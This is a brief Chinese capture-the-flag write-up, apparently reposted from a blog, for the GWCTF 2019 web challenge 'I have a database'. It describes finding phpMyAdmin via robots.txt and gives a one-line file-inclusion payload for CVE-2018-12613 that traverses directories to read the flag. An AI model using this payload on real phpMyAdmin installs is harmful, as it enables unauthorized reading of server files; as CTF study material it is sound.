数据库
首页 > 数据库> > web | [GWCTF 2019]我有一个数据库

web | [GWCTF 2019]我有一个数据库

作者:互联网

[GWCTF 2019]我有一个数据库

信息泄露,存在robots.txt。
然后发现存在phpmyadmin,可以实现任意文件读取(CVE-2018-12613(phpmyadmin远程文件包含漏洞)):
phpmyadmin/index.php?target=db_datadict.php?/../../../../../flag
直接get flag。

标签:web,..,phpmyadmin,flag,GWCTF,2019,php
来源: https://www.cnblogs.com/Mz1-rc/p/15543266.html